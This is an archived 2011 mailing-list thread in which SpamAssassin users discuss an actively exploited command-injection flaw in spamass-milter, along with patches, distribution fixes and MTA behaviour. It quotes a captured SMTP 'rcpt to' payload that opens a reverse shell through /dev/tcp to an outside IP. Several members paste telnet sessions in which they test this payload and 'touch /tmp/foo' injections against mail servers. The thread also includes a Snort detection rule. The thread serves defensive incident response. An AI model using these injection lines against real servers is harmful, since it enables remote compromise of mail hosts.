Mailing List Archive

Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
heads up:

if case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt











The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it. Although, if we're not seeing
this sort of thing pop up on customer's boxes, a manual block in
scanner2 is sufficient for now, right?

Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip
for 5 mins?

(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this. I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-alert@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
>*| *SECNAP Network Security Corporation

·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


______________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r).
For Information please see http://www.secnap.com/products/spammertrap/
______________________________________________________________________
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Thu, 10 Feb 2011 12:42:40 -0500
Michael Scheidell <michael.scheidell@secnap.com> wrote:

> heads up:

Aieee.... popen() in security-sensitive software!??!??

Also, why does the milter process run as root? That seems like a huge
hole all by itself.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> if case you are using spamassassin milter:
>>
>> active exploits going on.
>>
>> <http://seclists.org/fulldisclosure/2010/Mar/140>
>> <http://www.securityfocus.com/bid/38578>
>>
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>>
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee.... popen() in security-sensitive software!??!??
>
> Also, why does the milter process run as root? That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix? I assume so, but wanted
an explicit confirmation. (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> Does this affect sendmail as well as postfix? I assume so,
> but wanted an explicit confirmation.

Yes, the security hole is entirely within the milter,
independent of the MTA.

Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 02/11/2011 09:37 AM, Mark Martinec wrote:
> Yes, the security hole is entirely within the milter,
> independent of the MTA.
>
That exploit is dated Mar 2010? Has this really not been fixed in about
a year???

--
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Fri, 11 Feb 2011 09:50:05 +1300
Jason Haar <Jason.Haar@trimble.co.nz> wrote:

> That exploit is dated Mar 2010? Has this really not been fixed in
> about a year???

If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
it looks like the last release was in 2006. It looks like that project
is abandoned.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Sorry to follow up on myself...

> If everyone is talking about
> http://savannah.nongnu.org/projects/spamass-milt/, it looks like the
> last release was in 2006. It looks like that project is abandoned.

I cannot edit the wiki, but I think spamass-milt should be removed from
http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
unsafe. There are several other milters available; people shouldn't
be using spamass-milt.

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
* Mark Martinec <Mark.Martinec+sa@ijs.si>:
> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> > Does this affect sendmail as well as postfix? I assume so,
> > but wanted an explicit confirmation.
>
> Yes, the security hole is entirely within the milter,
> independent of the MTA.

I tried the exploit and it seems that Postfix' restrictions that check for FQDN
address and correct recipient syntax prevent the exploit from getting through:

telnet mail.example.de 25
220 mail.example.de ESMTP Postfix
HELO foo
250 mail.example.de
MAIL FROM:<>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
QUIT
221 2.0.0 Bye

Can anyone confirm this?

p@rick


--
state of mind
Digitale Kommunikation

http://www.state-of-mind.de

Franziskanerstraße 15 Telefon +49 89 3090 4664
81669 München Telefax +49 89 3090 4666

Amtsgericht München Partnerschaftsregister PR 563
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Thu, 2011-02-10 at 16:04 -0500, David F. Skoll wrote:
> I cannot edit the wiki,

I'd be happy to change that. :)

Please just drop me your wiki user name. Same goes for everyone else who
wants to edit the wiki. We've been forced to put ACLs in place as a
counter measure to vandalism and abuse for spam.


> [...] but I think spamass-milt should be removed from
> http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
> unsafe. There are several other milters available; people shouldn't
> be using spamass-milt.

--
char *t="\10pse\0r\0dtu\0.@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4";
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;i<l;i++){ i%8? c<<=1:
(c=*++x); c&128 && (s+=h); if (!(h>>=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}
Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.





On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> if case you are using spamassassin milter:
>
> active exploits going on.
>
> <http://seclists.org/fulldisclosure/2010/Mar/140>
> <http://www.securityfocus.com/bid/38578>
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
>
> -------- Original Message --------
> Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
>
>
>
>
>
>
>
>
>
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
>
>
> Personally, I would probably block it. Although, if we’re not seeing
> this sort of thing pop up on customer’s boxes, a manual block in
> scanner2 is sufficient for now, right?
>
>
>
> Either way, let me know and I’ll block/unblock/leave alone.
>
>
>
>
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>
>
> *From:*Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
>
>
> is the snort rule specific enough that you can block the offending ip
> for 5 mins?
>
> (if its a real smtp server, it will retry) and legit email through.
>
>
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don’t like the looks of this. I blocked that IP with samtool.
>
>
>
> Payload:
>
>
>
> rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
>
> data
>
> .
>
> quit
>
>
>
>
>
>
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>
>
> *From:*SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-alert@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
> Plugin Remote Arbitrary Command Injection Attempt
>
>
>
> 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
> Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
>
>
> --
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> ISN: 1259*1300
> >*| *SECNAP Network Security Corporation
>
> · Certified SNORT Integrator
>
> · 2008-9 Hot Company Award Winner, World Executive Alliance
>
> · Five-Star Partner Program 2009, VARBusiness
>
> · Best in Email Security,2010: Network Products Guide
>
> · King of Spam Filters, SC Magazine 2008
>
>
> ------------------------------------------------------------------------
>
> This email has been scanned and certified safe by SpammerTrap®.
> For Information please see http://www.secnap.com/products/spammertrap/
>
> ------------------------------------------------------------------------
>
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Fri, 11 Feb 2011, Jason Haar wrote:

> On 02/11/2011 09:37 AM, Mark Martinec wrote:
> > Yes, the security hole is entirely within the milter,
> > independent of the MTA.
> >
> That exploit is dated Mar 2010? Has this really not been fixed in about
> a year???
>
>

"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


--
Dave Funk University of Iowa
<dbfunk (at) engineering.uiowa.edu> College of Engineering
319/335-5751 FAX: 319/384-0549 1256 Seamans Center
Sys_admin/Postmaster/cell_admin Iowa City, IA 52242-1527
#include <std_disclaimer.h>
Better is not better, 'standard' is better. B{
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Thu, 10 Feb 2011, David B Funk wrote:

> On Fri, 11 Feb 2011, Jason Haar wrote:
>
>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>> Yes, the security hole is entirely within the milter,
>>> independent of the MTA.
>>>
>> That exploit is dated Mar 2010? Has this really not been fixed in about
>> a year???
>>
>>
>
> "a year"??, try half-a-decade. I've got a copy of that code from March
> 2006 and the vulnerability is there. Rather stale project. ;)

heh.

I suppose we ought to compose a boilerplate response for the inevitable
visitors who will show up asking about this "exploit in SpamAssassin"...

--
John Hardin KA7OHZ http://www.impsec.org/~jhardin/
jhardin@impsec.org FALaholic #11174 pgpk -a jhardin@impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
Any time law enforcement becomes a revenue center, the system
becomes corrupt.
-----------------------------------------------------------------------
2 days until Abraham Lincoln's and Charles Darwin's 202nd Birthdays
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Thursday February 10 2011 22:26:37 Patrick Ben Koetter wrote:
> I tried the exploit and it seems that Postfix' restrictions that check for
> FQDN address and correct recipient syntax prevent the exploit from getting
> through:

> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:<root+:"|touch /tmp/foo">
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
> fully-qualified address
> RCPT TO:<root@localhost+:"|touch /tmp/foo">
> 501 5.1.3 Bad recipient address syntax

> Can anyone confirm this?

rcpt to:<root+:"|touch /tmp/foo;@example.com">
250 2.1.5 Ok


Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 2/10/2011 1:29 PM, John Hardin wrote:
> On Thu, 10 Feb 2011, David B Funk wrote:
>
>> On Fri, 11 Feb 2011, Jason Haar wrote:
>>
>>> On 02/11/2011 09:37 AM, Mark Martinec wrote:
>>>> Yes, the security hole is entirely within the milter,
>>>> independent of the MTA.
>>>>
>>> That exploit is dated Mar 2010? Has this really not been fixed in about
>>> a year???
>>>
>>>
>>
>> "a year"??, try half-a-decade. I've got a copy of that code from March
>> 2006 and the vulnerability is there. Rather stale project. ;)
>
> heh.
>
> I suppose we ought to compose a boilerplate response for the inevitable
> visitors who will show up asking about this "exploit in SpamAssassin"...
>

Perhaps more than boilerplate, but rather an official advisory to clear
up the confusion? Given that upstream of that milter is dead, nobody
else will make an official advisory?

Warren
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 10/02/2011 19:21, David F. Skoll wrote:
> On Thu, 10 Feb 2011 12:42:40 -0500
> Michael Scheidell<michael.scheidell@secnap.com> wrote:
>
>> heads up:
> Aieee.... popen() in security-sensitive software!??!??
>
> Also, why does the milter process run as root? That seems like a huge
> hole all by itself.
>
Under CentOS spamass-milter appears to run as sa-milt.

The Vulnerability is only active if the milter is run with the '-x'
expand (for virtusertable / alias expansion) option.

While the project page is inactive, the distribution packages of
spamass-milter often contain unofficial patches which expand its
features, and wouldn't surprise me if they also fix this vulnerability.

I believe Dan Nelson was the maintainer of the package, not sure if it
is the same Dan Nelson that is often present on the MySQL lists.

Anyone know whether the CentOS one is vulnerable?

Name : spamass-milter
Arch : i386
Version : 0.3.1
Release : 24.rhel5

--
Best Regards,

Giles Coochey
NetSecSpec Ltd
NL T-Systems Mobile: +31 681 265 086
NL Mobile: +31 626 508 131
GIB Mobile: +350 5401 6693
Email/MSN/Live Messenger: giles@coochey.net
Skype: gilescoochey
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 10/02/2011 22:01, David F. Skoll wrote:
> On Fri, 11 Feb 2011 09:50:05 +1300
> Jason Haar<Jason.Haar@trimble.co.nz> wrote:
>
>> That exploit is dated Mar 2010? Has this really not been fixed in
>> about a year???
> If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
> it looks like the last release was in 2006. It looks like that project
> is abandoned.
>

Not quite abandoned:

*From*: Dan Nelson
*Subject*: Re: alert: New event: ET EXPLOIT Possible SpamAssassin
Milter Plugin Remote Arbitrary Command Injection Attempt
*Date*: Fri, 11 Feb 2011 00:08:26 -0600
*User-agent*: Mutt/1.5.21 (2010-09-15)

------------------------------------------------------------------------

In the last episode (Feb 10), Don Armstrong said:
>/ On Thu, 10 Feb 2011, Adam Katz wrote:/
>/ > On 02/10/2011 10:21 AM, David F. Skoll wrote:/
>/ > > Aieee.... popen() in security-sensitive software!??!??/
>/ > > /
>/ > > Also, why does the milter process run as root? That seems like a huge/
>/ > > hole all by itself./
>/ > /
>/ > Does this affect sendmail as well as postfix?/
>/ /
>/ It only affects you if you're running with -x. This was patched in/
>/ Debian and Redhat in March of 2010./
>/ /
>/ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228/

I thought I committed the patch to CVS, but apparently hadn't. It's
committed now, and I'll do a release this weekend.

--
Dan Nelson
address@hidden


--
Best Regards,

Giles Coochey
NetSecSpec Ltd
NL T-Systems Mobile: +31 681 265 086
NL Mobile: +31 626 508 131
GIB Mobile: +350 5401 6693
Email/MSN/Live Messenger: giles@coochey.net
Skype: gilescoochey
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Am 10.02.2011 22:26, schrieb Patrick Ben Koetter:
> * Mark Martinec <Mark.Martinec+sa@ijs.si>:
>> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
>>> Does this affect sendmail as well as postfix? I assume so,
>>> but wanted an explicit confirmation.
>>
>> Yes, the security hole is entirely within the milter,
>> independent of the MTA.
>
> I tried the exploit and it seems that Postfix' restrictions that check for FQDN
> address and correct recipient syntax prevent the exploit from getting through:
>
> telnet mail.example.de 25
> 220 mail.example.de ESMTP Postfix
> HELO foo
> 250 mail.example.de
> MAIL FROM:<>
> 250 2.1.0 Ok
> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:<root+:"|touch /tmp/foo">
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
> RCPT TO:<root@localhost+:"|touch /tmp/foo">
> 501 5.1.3 Bad recipient address syntax
> QUIT
> 221 2.0.0 Bye
>
> Can anyone confirm this?
>
> p@rick
>
>
Hi Patrick the Problem was fixed last year, as far i know,

it never worked with default postfix settings
also the x switch isnt wide used

http://savannah.nongnu.org/bugs/?29136
--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 02/11/2011 03:39 AM, Giles Coochey wrote:
> Under CentOS spamass-milter appears to run as sa-milt.

IIRC, Debian does this too. However, the -x flag may require running as
root, so it is possible (I have not verified) that it never downgrades
its privileges.

> The Vulnerability is only active if the milter is run with the '-x'
> expand (for virtusertable / alias expansion) option.

Correct.

> While the project page is inactive, the distribution packages of
> spamass-milter often contain unofficial patches which expand its
> features, and wouldn't surprise me if they also fix this
> vulnerability.

They did. That fix was also supposed to go upstream but accidentally
did not.

> Anyone know whether the CentOS one is vulnerable?
>
> Name : spamass-milter
> Arch : i386
> Version : 0.3.1
> Release : 24.rhel5

You are all set.

RHEL release 0.3.1-17 introduced the fix. 0.3.1-19 includes a related
zombie process fix (CVE-2010-1132). See changelog in:
http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Am 11.02.2011 20:11, schrieb Adam Katz:
> On 02/11/2011 03:39 AM, Giles Coochey wrote:
>> Under CentOS spamass-milter appears to run as sa-milt.
>
> IIRC, Debian does this too. However, the -x flag may require running as
> root, so it is possible (I have not verified) that it never downgrades
> its privileges.
>
>> The Vulnerability is only active if the milter is run with the '-x'
>> expand (for virtusertable / alias expansion) option.
>
> Correct.
>
>> While the project page is inactive, the distribution packages of
>> spamass-milter often contain unofficial patches which expand its
>> features, and wouldn't surprise me if they also fix this
>> vulnerability.
>
> They did. That fix was also supposed to go upstream but accidentally
> did not.
>
>> Anyone know whether the CentOS one is vulnerable?
>>
>> Name : spamass-milter
>> Arch : i386
>> Version : 0.3.1
>> Release : 24.rhel5
>
> You are all set.
>
> RHEL release 0.3.1-17 introduced the fix. 0.3.1-19 includes a related
> zombie process fix (CVE-2010-1132). See changelog in:
> http://rpmfind.net//linux/RPM/fedora/devel/rawhide/i386/spamass-milter-0.3.1-24.fc15.i686.html#Changelog
>

whatever fixed in ubuntu lucid since last year

+spamass-milter (0.3.1-10) unstable; urgency=low
+
+ * Fix zombies which were happening with -x. (closes: #575019)
+
+ -- Don Armstrong <don@debian.org> Mon, 22 Mar 2010 14:39:12 -0700
+
+spamass-milter (0.3.1-9) unstable; urgency=high
+
+ * Call restorecon on the socket and pidfile directories to make SELinux
+ happy (thanks to Russell Coker) (closes: #518552)
+ * Document how to make inet:9999@127.0.0.1 work (closes: #519245)
+ * Document that using the -x option requires being in the smmsp group
+ (closes: #515158)
+ * Deal with inet:999 sockets (closes: #514749)
+ - handle them more sanely in the init script
+ - document how to deal with them in README.Debian and
+ /etc/spamass-milter/default
+ * Use new popenenv function instead of open; fixes remote code exploit
+ as the spamass-milter user when run using -x. (closes: #573228)
+
+ -- Don Armstrong <don@debian.org> Wed, 11 Mar 2009 03:59:39 -0700
+


--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
> On 2/10/2011 1:29 PM, John Hardin wrote:
>> I suppose we ought to compose a boilerplate response for the
>> inevitable visitors who will show up asking about this "exploit in
>> SpamAssassin"...
>
> Perhaps more than boilerplate, but rather an official advisory to
> clear up the confusion? Given that upstream of that milter is dead,
> nobody else will make an official advisory?

This came from an accidental lost checkin that has since been fixed.
There is little activity on the spamass-milter project because it
doesn't need anything; almost all updates go to SA and the MTAs rather
than the milter.

As noted by Robert Schetterer, postfix doesn't allow this syntax
anymore. As Giles Goochey forwarded from the sa-milter list, maintainer
Dan Nelson has committed the patch to CVS and will officially release
the fix this weekend. I'm one of several people who have mentioned that
this is fixed in both Fedora- and Debian- derived systems.

There appears to be a communication issue between these two lists; once
I connected the SA list to the SA-milter list, the issue got resolved in
very quick order. SA-milter is still one of the best methods for
invoking SA from sendmail or postfix.

I consider it a mission-critical component to be able to deliver a
rejection notice at SMTP-time (to avoid backscatter from an emailed
bounce message). The other systems out there (specifically amavis and
mailscanner) just can't do this while spamass-milter does it with very
little overhead or configuration.

I've considered working on boosting the support for SA in
milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
but most people have a hard time understanding that you can use that
milter without greylisting -- it does all sorts of useful things at
SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
tarpitting, spamassassin (limited), p0f, and greylisting.

Notes on SA support in Milter-Greylist:
http://tech.groups.yahoo.com/group/milter-greylist/message/5621
(Tip for evading Yahoo's cookies: set UserAgent to "Googlebot/2.1")
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Fri, 11 Feb 2011 12:08:35 -0800
Adam Katz <antispam@khopis.com> wrote:

> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

MIMEDefang can do it, plus all kinds of other things at SMTP time.
(Overhead may be slightly higher than spamass-milter, but probably
not much.)

Regards,

David.
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Am 11.02.2011 21:08, schrieb Adam Katz:
> On 02/10/2011 03:41 PM, Warren Togami Jr. wrote:
>> On 2/10/2011 1:29 PM, John Hardin wrote:
>>> I suppose we ought to compose a boilerplate response for the
>>> inevitable visitors who will show up asking about this "exploit in
>>> SpamAssassin"...
>>
>> Perhaps more than boilerplate, but rather an official advisory to
>> clear up the confusion? Given that upstream of that milter is dead,
>> nobody else will make an official advisory?
>
> This came from an accidental lost checkin that has since been fixed.
> There is little activity on the spamass-milter project because it
> doesn't need anything; almost all updates go to SA and the MTAs rather
> than the milter.
>
> As noted by Robert Schetterer, postfix doesn't allow this syntax
> anymore. As Giles Goochey forwarded from the sa-milter list, maintainer
> Dan Nelson has committed the patch to CVS and will officially release
> the fix this weekend. I'm one of several people who have mentioned that
> this is fixed in both Fedora- and Debian- derived systems.
>
> There appears to be a communication issue between these two lists; once
> I connected the SA list to the SA-milter list, the issue got resolved in
> very quick order. SA-milter is still one of the best methods for
> invoking SA from sendmail or postfix.
>
> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

shit happens, great you noticed it yet

>
> I've considered working on boosting the support for SA in
> milter-greylist (my C is 5-10+ years rusty and my free time is sparse),
> but most people have a hard time understanding that you can use that
> milter without greylisting -- it does all sorts of useful things at
> SMTP-time (before and after DATA), including SPF, DKIM, DNSBLs,
> tarpitting, spamassassin (limited), p0f, and greylisting.
>
> Notes on SA support in Milter-Greylist:
> http://tech.groups.yahoo.com/group/milter-greylist/message/5621
> (Tip for evading Yahoo's cookies: set UserAgent to "Googlebot/2.1")
>

yes milters are great, thx for your work on it

--
Best Regards

MfG Robert Schetterer

Germany/Munich/Bavaria
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
Adam Katz wrote:
> I consider it a mission-critical component to be able to deliver a
> rejection notice at SMTP-time (to avoid backscatter from an emailed
> bounce message). The other systems out there (specifically amavis and
> mailscanner) just can't do this while spamass-milter does it with very
> little overhead or configuration.

amavisd-new can be and is regularly used in a pre-queue filtering setups,
especially since the advances in a warm-reload and tighter time limiting
control on SpamAssasasin 3.3 combined more recent versions of amavisd.
These advances go hand-in-hand with a Postfix 2.7.0 new option
smtpd_proxy_options=speed_adjust. In a pre-queue filtering setup
amavisd can do a proper D_REJECT right on the incoming SMTP session,
just like a milter can (but offer added flexibility).

Mark
Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [ In reply to ]
On Fri, Feb 11, 2011 at 09:30:15PM +0100, Mark Martinec wrote:
> Adam Katz wrote:
> > I consider it a mission-critical component to be able to deliver a
> > rejection notice at SMTP-time (to avoid backscatter from an emailed
> > bounce message). The other systems out there (specifically amavis and
> > mailscanner) just can't do this while spamass-milter does it with very
> > little overhead or configuration.
>
> amavisd-new can be and is regularly used in a pre-queue filtering setups,
> especially since the advances in a warm-reload and tighter time limiting
> control on SpamAssasasin 3.3 combined more recent versions of amavisd.
> These advances go hand-in-hand with a Postfix 2.7.0 new option
> smtpd_proxy_options=speed_adjust. In a pre-queue filtering setup
> amavisd can do a proper D_REJECT right on the incoming SMTP session,
> just like a milter can (but offer added flexibility).

And lets not forget that there is also amavisd-milter specifically.. it
works fine here. Come on Adam..
